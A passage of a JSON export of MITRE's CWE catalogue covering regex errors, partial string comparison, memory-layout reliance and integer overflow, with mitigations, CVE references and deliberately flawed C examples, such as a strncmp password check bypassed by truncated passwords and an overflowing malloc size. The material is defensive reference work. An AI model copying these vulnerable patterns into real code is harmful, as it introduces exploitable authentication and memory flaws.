Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Regular Expression Error","attr":{"@_Date":"2008-09-09"}}}},"186":{"attr":{"@_ID":"186","@_Name":"Overly Restrictive Regular Expression","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A regular expression is overly restrictive, which prevents dangerous values from being detected.","Extended_Description":"This weakness is not about regular expression complexity. Rather, it is about a regular expression that does not match all values that are intended. Consider the use of a regexp to identify acceptable values or to spot unwanted terms. An overly restrictive regexp misses some potentially security-relevant values leading to either false positives *or* false negatives, depending on how the regexp is being used within the code. Consider the expression /[0-8]/ where the intention was /[0-9]/.  This expression is not \\"complex\\" but the value \\"9\\" is not matched when maybe the programmer planned to check for it.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"185","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"184","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"183","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Regular expressions can become error prone when defining a complex language even for those experienced in writing grammars. Determine if several smaller regular expressions simplify one large regular expression. Also, subject your regular expression to thorough testing techniques such as equivalence partitioning, boundary value analysis, and robustness. After testing and a reasonable confidence level is achieved, a regular expression may not be foolproof. If an exploit is allowed to slip through, then record the exploit and refactor your regular expression."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1604","Description":"MIE. \\".php.ns\\" bypasses \\".php$\\" regexp but is still parsed as PHP by Apache. (manipulates an equivalence property under Apache)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1604"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Overly Restrictive Regular Expression"}},"Notes":{"Note":{"#text":"Can overlap allowlist/denylist errors (CWE-183/CWE-184)","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationship_Notes"}]}},"187":{"attr":{"@_ID":"187","@_Name":"Partial String Comparison","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a comparison that only examines a portion of a factor before determining whether there is a match, such as a substring, leading to resultant weaknesses.","Extended_Description":"For example, an attacker might succeed in authentication by providing a small password that matches the associated portion of the larger, correct password.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control"],"Impact":["Alter Execution Logic","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv) {}","xhtml:br":["","","","","","","",""],"xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:div":[{"#text":"if (strncmp(username, inUser, strlen(inUser))) {}if (! strncmp(pass, inPass, strlen(inPass))) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"logEvent(\\"Auth failure of username using strlen of inUser\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth success of password using strlen of inUser\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth fail of password using sizeof\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int authResult;if (argc &lt; 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}}]}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"ppapaspass","xhtml:br":["","",""]}}],"Body_Text":["In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application\'s password before determining success.","As a result, this partial comparison leads to improper authentication (CWE-287).","Any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","This significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"a\\" and \\"adm\\" will succeed for the username.","While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-6394","Description":"Product does not prevent access to restricted directories due to partial string comparison with a public directory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6394"},{"Reference":"CVE-2004-1012","Description":"Argument parser of an IMAP server treats a partial command \\"body[p\\" as if it is \\"body.peek\\", leading to index error and out-of-bounds corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1012"},{"Reference":"CVE-2004-0765","Description":"Web browser only checks the hostname portion of a certificate when the hostname portion of the URI is not a fully qualified domain name (FQDN), which allows remote attackers to spoof trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0765"},{"Reference":"CVE-2002-1374","Description":"One-character password by attacker checks only against first character of real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1374"},{"Reference":"CVE-2000-0979","Description":"One-character password by attacker checks only against first character of real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0979"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Partial Comparison"}},"Notes":{"Note":{"#text":"This is conceptually similar to other weaknesses, such as insufficient verification and regular expression errors. It is primary to some weaknesses.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Name, Observed_Examples, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Partial Comparison","attr":{"@_Date":"2018-03-27"}}}},"188":{"attr":{"@_ID":"188","@_Name":"Reliance on Data/Memory Layout","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software makes invalid assumptions about how protocol data or memory is organized at a lower level, resulting in unintended program behavior.","Extended_Description":{"xhtml:p":["When changing platforms or protocol versions, in-memory organization of data may change in unintended ways. For example, some architectures may place local variables A and B right next to each other with A on top; some may place them next to each other with B on top; and others may add some padding to each. The padding size may vary to ensure that each variable is aligned to a proper word size.","In protocol implementations, it is common to calculate an offset relative to another field to pick out a specific piece of data. Exceptional conditions, often involving new protocol versions, may add corner cases that change the data layout in an unusual way. The result can be that an implementation accesses an unintended field in the packet, treating data of one type as data of another type."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1105","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Memory","Read Memory"],"Note":"Can result in unintended modifications or exposure of sensitive memory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":"In flat address space situations, never allow computing memory addresses as offsets from another memory address."},{"Phase":"Architecture and Design","Description":"Fully specify protocol layout unambiguously, providing a structured grammar (e.g., a compilable yacc grammar)."},{"Phase":"Testing","Description":"Testing: Test that the implementation properly handles each case in the protocol grammar."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example function, the memory address of variable b is derived by adding 1 to the address of variable a. This derived address is then used to assign the value 0 to b.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void example() {}","xhtml:div":{"#text":"char a;char b;*(&amp;a + 1) = 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"Here, b may not be one byte past a. It may be one byte in front of a. Or, they may have three bytes between them because they are aligned on 32-bit boundaries."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Reliance on data layout"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Structure Padding&#34;, Page 284"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Reliance on Data Layout","attr":{"@_Date":"2008-04-11"}}}},"190":{"attr":{"@_ID":"190","@_Name":"Integer Overflow or Wraparound","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control.","Extended_Description":"An integer overflow or wraparound occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may wrap to become a very small or negative number. While this may be intended behavior in circumstances that rely on wrapping, it can have security consequences if the wrap is unexpected. This is especially the case if the integer overflow can be triggered using user-supplied inputs. This becomes security-critical when the result is used to control looping, make a security decision, or determine the offset or size in behaviors such as memory allocation, copying, concatenation, etc.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000","@_Chain_ID":"680"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":"This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Effectiveness":"High"},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Black Box","Description":"Sometimes, evidence of this weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate","Effectiveness_Notes":"Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring follow-up manual methods to diagnose the underlying problem."},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Ensure that all protocols are strictly defined, such that all out-of-bounds behavior can be identified simply, and require strict conformance to the protocol."},{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","If possible, choose a language or compiler that performs automatic bounds checking."]}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Use libraries or frameworks that make it easier to handle numbers without unexpected consequences.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106]"]}},{"attr":{"@_Mitigation_ID":"MIT-8"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range.","Use unsigned integers where possible. This makes it easier to perform validation for integer overflows. When signed integers are required, ensure that the range check includes minimum values as well as maximum values."]}},{"attr":{"@_Mitigation_ID":"MIT-36"},"Phase":"Implementation","Description":{"xhtml:p":["Understand the programming language\'s underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, \\"not-a-number\\" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7]","Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect the numeric representation."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-26"},"Phase":"Implementation","Strategy":"Compilation or Build Hardening","Description":"Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."},{"Intro_Text":"The following code excerpt from OpenSSH 3.3 demonstrates a classic case of integer overflow:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"nresp = packet_get_int();if (nresp &gt; 0) {}","xhtml:br":"","xhtml:div":{"#text":"response = xmalloc(nresp*sizeof(char*));for (i = 0; i &lt; nresp; i++) response[i] = packet_get_string(NULL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0. Most malloc() implementations will happily allocate a 0-byte buffer, causing the subsequent loop iterations to overflow the heap buffer response."},{"Intro_Text":"Integer overflows can be complicated and difficult to detect. The following example is an attempt to show how an integer overflow may lead to undefined looping behavior:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"short int bytesRec = 0;char buf[SOMEBIGNUM];while(bytesRec &lt; MAXGET) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"bytesRec += getFromInput(buf+bytesRec);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"In the above case, it is entirely possible that bytesRec may overflow, continuously creating a lower number than MAXGET and also overwriting the first MAXGET-1 bytes of buf."},{"Intro_Text":"In this example the method determineFirstQuarterRevenue is used to determine the first quarter revenue for an accounting/business application. The method retrieves the monthly sales totals for the first three months of the year, calculates the first quarter sales totals from the monthly sales totals, calculates the first quarter revenue based on the first quarter sales, and finally saves the first quarter revenue results to the database.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define JAN 1#define FEB 2#define MAR 3short getMonthlySales(int month) {...}float calculateRevenueForQuarter(short quarterSold) {...}int determineFirstQuarterRevenue() {}","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"float quarterRevenue = 0.0f;short JanSold = getMonthlySales(JAN); /* Get sales in January */short FebSold = getMonthlySales(FEB); /* Get sales in February */short MarSold = getMonthlySales(MAR); /* Get sales in March */short quarterSold = JanSold + FebSold + MarSold;quarterRevenue = calculateRevenueForQuarter(quarterSold);saveFirstQuarterRevenue(quarterRevenue);return 0;","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// Variable for sales revenue for the quarter","// Calculate quarterly total","// Calculate the total revenue for the quarter"]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...float calculateRevenueForQuarter(long quarterSold) {...}int determineFirstQuarterRevenue() {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...long quarterSold = JanSold + FebSold + MarSold;quarterRevenue = calculateRevenueForQuarter(quarterSold);...","xhtml:br":["","","","","","",""],"xhtml:i":["// Calculate quarterly total","// Calculate the total revenue for the quarter"]}}}}],"Body_Text":["However, in this example the primitive type short int is used for both the monthly and the quarterly sales variables. In C the short int primitive type has a maximum value of 32768. This creates a potential integer overflow if the value for the three monthly sales adds up to more than the maximum value for the short int primitive type. An integer overflow can lead to data corruption, unexpected behavior, infinite loops and system crashes. To correct the situation the appropriate primitive type should be used, as in the example below, and/or provide some validation mechanism to ensure that the maximum value for the primitive type is not exceeded.","Note that an integer overflow could also occur if the quarterSold variable has a primitive type long but the method calculateRevenueForQuarter has a parameter of type short."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-10887","Description":"Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887"},{"Reference":"CVE-2019-1010006","Description":"Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006"},{"Reference":"CVE-2010-2753","Description":"Chain: integer overflow leads to 